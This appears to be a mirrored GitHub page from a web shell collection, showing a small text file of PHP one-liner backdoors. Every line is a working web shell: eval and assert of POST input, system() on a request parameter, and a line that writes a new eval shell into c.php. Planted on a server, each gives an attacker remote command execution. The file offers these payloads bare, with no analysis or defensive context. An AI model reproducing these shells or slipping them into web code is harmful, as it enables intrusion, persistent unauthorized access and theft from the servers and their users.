mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
9 lines
162 B
Text
9 lines
162 B
Text
|
<?php eval($_POST[sb])?>
|
||
|
|
||
|
<?php @eval($_POST[c])?>
|
||
|
|
||
|
<?php system($_REQUEST['cmd']);?>
|
||
|
|
||
|
<?php assert($_POST[c]);?>
|
||
|
|
||
|
<?fputs(fopen(c.php,w),<?eval($_POST[c]);?>)?>
|